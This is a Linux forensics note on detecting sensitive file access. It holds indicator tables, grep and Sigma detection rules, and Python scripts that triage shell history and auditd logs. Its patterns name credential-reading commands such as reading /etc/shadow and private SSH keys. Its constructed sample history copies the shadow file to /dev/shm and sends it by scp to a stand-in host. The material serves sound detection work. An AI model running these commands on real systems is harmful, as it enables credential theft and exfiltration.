This note documents detection patterns related to Sensitive File Access on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Shell history | cat /etc/shadow | Password hash access | Critical | High-confidence credential access. |
| Shell history | cat /etc/passwd | Account enumeration | High | Often paired with shadow access. |
| Shell history | sudo cat /etc/shadow | Privileged credential theft | Critical | Strong escalation evidence. |
| Shell history | grep root /etc/shadow | Targeted credential inspection | Critical | Strong operator intent. |
| Shell history | cat ~/.ssh/id_rsa | Private key access | Critical | Credential theft or reuse. |
| Shell history | cat ~/.ssh/authorized_keys | Access path review | High | Persistence reconnaissance. |
| Shell history | cat /root/.bash_history | Root activity theft | Critical | Post-compromise intelligence gathering. |
| Shell history | ls /root/.ssh | Root key enumeration | Critical | Strong privilege abuse indicator. |
| Shell history | find / -name "*.pem" | Key hunting | Critical | Broad credential search. |
| Shell history | find / -name "*.key" | Key hunting | Critical | Broad credential search. |
| Shell history | cat /etc/hosts | Internal environment mapping | Medium | Often early reconnaissance. |
| auditd | Read access to sensitive files (watch rules on the paths) | Ground-truth file access record | Critical | Best attribution if enabled. |
| File access timestamps | atime changes | Read timing anchor | High | Useful if enabled. |
| journalctl | Privileged file read context | Runtime clue | Medium | Limited but sometimes useful. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Shadow access after sudo | Credential theft progression | Critical | Common post-escalation move. |
| Key file access after SSH foothold | Credential expansion | Critical | Lateral movement preparation. |
| Root history access | Operator situational awareness | High | Indicates hands-on intrusion. |
| Broad file hunting | find across key extensions | Critical | Credential collection pattern. |
| Sensitive file copied to temp | Exfil staging | Critical | Strong malicious chain. |
| Sensitive file plus scp/curl | Exfiltration path | Critical | Strong compromise signal. |
| Access under service account | Highly suspicious | Critical | Often exploitation context. |
| Access followed by hash cracking prep | Credential operation | Critical | Strong intent evidence. |
| Multiple key types searched | Broad credential harvesting | High | Operator maturity indicator. |
| Root-only file touched recently | Privileged compromise | Critical | Severity amplifier. |
Common Tools
| Tool | Usage |
|---|---|
| cat | Direct file read. |
| less | Interactive review. |
| grep | Targeted extraction. |
| find | Credential hunting. |
| cp | File staging. |
| tar | Bulk archive for exfiltration. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|---|---|---|
| Password hashes | /etc/shadow | Critical | Credential theft target. |
| Accounts | /etc/passwd | High | User inventory. |
| SSH private keys | ~/.ssh/id_* | Critical | Credential material. |
| Authorized keys | ~/.ssh/authorized_keys | High | Access persistence context. |
| Root history | /root/.bash_history | Critical | High-value attacker target. |
| Root SSH | /root/.ssh/ | Critical | Privileged credential target. |
| Audit logs | /var/log/audit/audit.log | Critical | File read attribution. |
| Temp dirs | /tmp, /var/tmp, /dev/shm | High | Staged sensitive copies. |
MITRE ATT&CK References
- T1003 OS Credential Dumping
- T1552 Unsecured Credentials
- T1552.001 Credentials in Files
Decision Tree
- Was sensitive file accessed?
  - Search shell history and audit logs.
- Which file?
  - Shadow, keys, root history, configs.
- Was privilege needed?
  - Check sudo or root context.
- Was file copied or exfiltrated?
  - Temp paths, scp, curl, archives.
- Was credential reused?
  - Follow into SSH movement or persistence.
- Pivot
  - File → credential type.
  - User → privilege context.
  - Timestamp → intrusion timeline.
- Confirm credential access
  - Sensitive file read + suspicious sequence = strong credential collection.
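The decision tree above is a sequence check over shell history: a direct indicator on its own is a hit, and the order of hits (privileged context, then a sensitive read, then staging or a transfer tool) is what turns it into the indirect indicators from the earlier table. The script below is an added example, not part of the original note: it applies the note's patterns to a constructed bash history (the `#<epoch>` lines are what bash writes when `HISTTIMEFORMAT` is set, which supplies the timestamp pivot) and returns the per-command findings plus the chains the tree asks about. The pattern list and chain names are this example's own choices, taken from the note's tables.

```python
"""Triage a shell history for sensitive-file access chains.

Added example, not part of the original note. The history below is
constructed for the example; nothing in it was captured from a real host.
"""
import re

# Direct indicators from the note: (regex, label, forensic value).
# Order matters: the privileged shadow variant is tested before the plain one.
DIRECT = [
    (r"^sudo\b.*/etc/shadow\b", "privileged shadow read", "critical"),
    (r"/etc/shadow\b", "shadow access", "critical"),
    (r"/etc/passwd\b", "account enumeration", "high"),
    (r"\.ssh/id_\w+", "private key access", "critical"),
    (r"authorized_keys", "authorized_keys review", "high"),
    (r"/root/\.bash_history", "root history theft", "critical"),
    (r"/root/\.ssh\b", "root key enumeration", "critical"),
    (r"\bfind\b.*-name\s+\"?\*\.(pem|key)", "key hunting", "critical"),
    (r"/etc/hosts\b", "host mapping", "medium"),
]
# Staging into the temp paths the note lists (cp/tar target or a redirect),
# transfer tools, and commands that open a privileged shell.
STAGING_RE = re.compile(r"^(cp|tar)\b.*(/tmp|/var/tmp|/dev/shm)/|>\s*(/tmp|/var/tmp|/dev/shm)/")
EXFIL_RE = re.compile(r"\b(scp|curl|wget)\b")
PRIV_SHELL_RE = re.compile(r"^(sudo\s+(-i|-s|su\b)|su\b)")

# Constructed sample history (HISTTIMEFORMAT style, epoch before each command).
SAMPLE_HISTORY = """\
#1700000100
sudo -i
#1700000160
cat /etc/passwd
#1700000200
cat /etc/shadow
#1700000230
find / -name "*.pem" 2>/dev/null
#1700000240
find / -name "*.key" 2>/dev/null
#1700000300
cp /etc/shadow /dev/shm/.s
#1700000330
scp /dev/shm/.s backup.example.net:/tmp/
"""


def parse_history(text):
    """Yield (epoch or None, command); bash writes '#<epoch>' before a command."""
    stamp = None
    for line in text.splitlines():
        if re.fullmatch(r"#\d+", line):
            stamp = int(line[1:])
            continue
        if line.strip():
            yield stamp, line.strip()
            stamp = None


def classify(cmd):
    """Return (label, severity) for the first direct indicator that matches."""
    for pattern, label, severity in DIRECT:
        if re.search(pattern, cmd):
            return label, severity
    return None, None


def triage(history_text):
    """Return per-command findings and the indirect-indicator chains observed."""
    events = []
    chains = set()
    privileged = False      # a root shell was opened earlier in the history
    sensitive_seen = False  # at least one sensitive file was touched so far
    key_types = set()       # extensions hunted with find
    for stamp, cmd in parse_history(history_text):
        if PRIV_SHELL_RE.match(cmd):
            privileged = True
        label, severity = classify(cmd)
        if label:
            events.append({"time": stamp, "cmd": cmd, "label": label, "severity": severity})
            sensitive_seen = True
            if "shadow" in label and (privileged or cmd.startswith("sudo")):
                chains.add("shadow access after sudo")
            key_types.update(re.findall(r"\*\.(pem|key)", cmd))
        # Staging and transfer only matter once a sensitive file is in play.
        if sensitive_seen and STAGING_RE.search(cmd):
            chains.add("sensitive file copied to temp")
        if sensitive_seen and EXFIL_RE.search(cmd):
            chains.add("sensitive file plus scp/curl")
    if len(key_types) > 1:
        chains.add("multiple key types searched")
    return events, sorted(chains)


if __name__ == "__main__":
    found, observed = triage(SAMPLE_HISTORY)
    for ev in found:
        print(ev["time"], ev["severity"], ev["label"], "::", ev["cmd"])
    print("chains:", observed)
```

Run it against a real history by reading `/home/<user>/.bash_history` into `triage()`; without `HISTTIMEFORMAT` the `time` field is `None` and ordering within the file is the only timeline available, which is why the note treats auditd as the better attribution source.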
Example Detection Templates
Grep

```bash
grep -R "cat /etc/shadow\|cat /etc/passwd\|id_rsa\|authorized_keys\|/root/.bash_history\|find / -name \".*pem\"" /home/*/.bash_history /root/.bash_history 2>/dev/null
grep -R "shadow\|id_rsa\|authorized_keys\|\.pem\|\.key" /home/*/.bash_history /root/.bash_history 2>/dev/null
grep -R "sudo cat /etc/shadow" /home /root 2>/dev/null
```

Journalctl

```bash
journalctl | grep -E "shadow|authorized_keys|id_rsa"
```

File Inspection

```bash
find /home /root -name "*.pem" -o -name "*.key" 2>/dev/null
stat /etc/shadow
```
Sigma

```yaml
title: Linux Sensitive File Access
id: linux-sensitive-file-access
status: experimental
description: Detects suspicious access to sensitive credential-bearing files on Linux
logsource:
  product: linux
detection:
  selection_keywords:
    message|contains:
      - '/etc/shadow'
      - 'id_rsa'
      - 'authorized_keys'
      - '/root/.bash_history'
  condition: selection_keywords
fields:
  - message
  - hostname
falsepositives:
  - Legitimate administration
level: high
tags:
  - attack.credential_access
  - attack.t1552.001
```
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Least privilege | Restrict access to sensitive files | Critical | Core credential defense. |
| Auditd | Monitor reads of high-value files | Critical | Strong attribution. |
| Key hygiene | Protect private keys and rotate when exposed | High | Limits credential reuse. |
| Root access control | Limit sudo/root shell spread | High | Reduces privileged file exposure. |
| File integrity | Watch sensitive path reads/writes | High | Important high-value coverage. |
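The auditd row is the one control in this table that also answers the attribution question from the decision tree: a watch rule on the file produces a SYSCALL record (with `auid`, the login uid that survives `sudo`) joined to PATH records by a shared event serial. The parser below is an added example, not part of the original note. It assumes a watch such as `-w /etc/shadow -p r -k sensitive-read` is loaded; the audit records it parses are constructed for the example, and the field set and the `4294967295` unset-auid convention are standard auditd output.

```python
"""Attribute reads of sensitive files from auditd records.

Added example, not part of the original note. Assumes watch rules like
`-w /etc/shadow -p r -k sensitive-read` so each read emits a SYSCALL record
plus PATH records sharing one event serial. Sample records are constructed.
"""
import re
from collections import defaultdict

# High-value paths from the note's Relevant Artifacts table (substring match).
SENSITIVE_PATHS = ("/etc/shadow", "/root/.bash_history", "/root/.ssh/",
                   "/.ssh/id_", "/.ssh/authorized_keys")

# Constructed records: 101 = a user reading shadow after sudo (auid 1000, uid 0);
# 102 = a daemon with no login uid reading shadow; 103 = a benign passwd read.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000000.101:101): arch=c000003e syscall=257 success=yes exit=3 ppid=2001 pid=2002 auid=1000 uid=0 gid=0 euid=0 tty=pts0 ses=5 comm="cat" exe="/usr/bin/cat" key="sensitive-read"
type=CWD msg=audit(1700000000.101:101): cwd="/home/alice"
type=PATH msg=audit(1700000000.101:101): item=0 name="/etc/shadow" inode=1234 dev=fd:01 mode=0100640 ouid=0 ogid=42 nametype=NORMAL
type=SYSCALL msg=audit(1700000000.250:102): arch=c000003e syscall=257 success=yes exit=4 ppid=900 pid=901 auid=4294967295 uid=0 gid=0 euid=0 tty=(none) ses=4294967295 comm="tar" exe="/usr/bin/tar" key="sensitive-read"
type=PATH msg=audit(1700000000.250:102): item=0 name="/etc/shadow" inode=1234 dev=fd:01 mode=0100640 ouid=0 ogid=42 nametype=NORMAL
type=SYSCALL msg=audit(1700000000.300:103): arch=c000003e syscall=257 success=yes exit=3 ppid=2001 pid=2010 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts0 ses=5 comm="getent" exe="/usr/bin/getent" key="sensitive-read"
type=PATH msg=audit(1700000000.300:103): item=0 name="/etc/passwd" inode=1235 dev=fd:01 mode=0100644 ouid=0 ogid=0 nametype=NORMAL
"""

UNSET_AUID = "4294967295"  # (uid_t)-1: process has no login session (daemons)
RECORD_RE = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\): (.*)$")
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_fields(body):
    """Turn 'k=v k="quoted v"' into a dict, stripping quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(body)}


def group_events(log_text):
    """Group records by event serial; auditd uses one serial per syscall."""
    events = defaultdict(lambda: {"paths": []})
    for line in log_text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue
        rtype, ts, serial, body = m.groups()
        ev = events[serial]
        ev["time"] = float(ts)
        fields = parse_fields(body)
        if rtype == "SYSCALL":
            ev.update(fields)
        elif rtype == "PATH":
            ev["paths"].append(fields.get("name", ""))
    return events


def is_sensitive(path):
    return any(marker in path for marker in SENSITIVE_PATHS)


def attribute_reads(log_text):
    """Return one finding per successful read of a sensitive path, oldest first."""
    findings = []
    ordered = sorted(group_events(log_text).items(), key=lambda kv: kv[1]["time"])
    for serial, ev in ordered:
        hits = [p for p in ev["paths"] if is_sensitive(p)]
        if not hits or ev.get("success") != "yes":
            continue
        auid, uid = ev.get("auid"), ev.get("uid")
        findings.append({
            "serial": serial,
            "time": ev["time"],
            "file": hits[0],
            "auid": auid,                 # who logged in, even after sudo
            "uid": uid,                   # who the process ran as
            "comm": ev.get("comm"),
            "exe": ev.get("exe"),
            "tty": ev.get("tty"),
            # auid kept but uid changed: the user escalated before the read
            "escalated": auid not in (None, UNSET_AUID) and auid != uid,
            # no login uid: the read came from a service context
            "service_account": auid == UNSET_AUID,
        })
    return findings


if __name__ == "__main__":
    for f in attribute_reads(SAMPLE_AUDIT_LOG):
        print(f["serial"], f["file"], "auid=%s uid=%s" % (f["auid"], f["uid"]),
              f["comm"], "escalated" if f["escalated"] else "",
              "service-account" if f["service_account"] else "")
```

Feed it `/var/log/audit/audit.log` (or `ausearch -k sensitive-read` output) and the `escalated` and `service_account` flags map directly onto the "Shadow access after sudo" and "Access under service account" rows of the indirect indicators table; `auid` is the value to pivot on when the shell history was cleared.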
Fast Triage Checks
| Question | Command / Artifact | Why It Matters |
|---|---|---|
| Was shadow accessed? | grep history / audit | Credential theft check. |
| Were keys viewed? | inspect ssh paths | Lateral movement clue. |
| Was root history read? | grep shell history | Operator awareness clue. |
| Was file copied? | inspect temp dirs | Exfil staging. |
| Was file transferred? | scp / curl history | Exfil proof. |
| Was privilege escalated first? | sudo timeline | Attack chain reconstruction. |
High Value Grep Strings
| Pattern | Why It Matters |
|---|---|
| /etc/shadow | Password hash target. |
| /etc/passwd | User inventory. |
| id_rsa | Private key access. |
| authorized_keys | Persistence/access review. |
| /root/.bash_history | Root activity theft. |
| .pem | Key hunting. |
| .key | Key hunting. |
Analyst Notes
| Scenario | Interpretation |
|---|---|
| Shadow access after sudo | Strong credential theft chain. |
| Root key read | High-severity credential compromise. |
| Sensitive file copied to temp | Exfil staging likely. |
| Key hunting across filesystem | Broad credential harvest. |
| Root history read early | Operator gathering context fast. |
| Shadow + SSH movement | Credential-to-lateral chain. |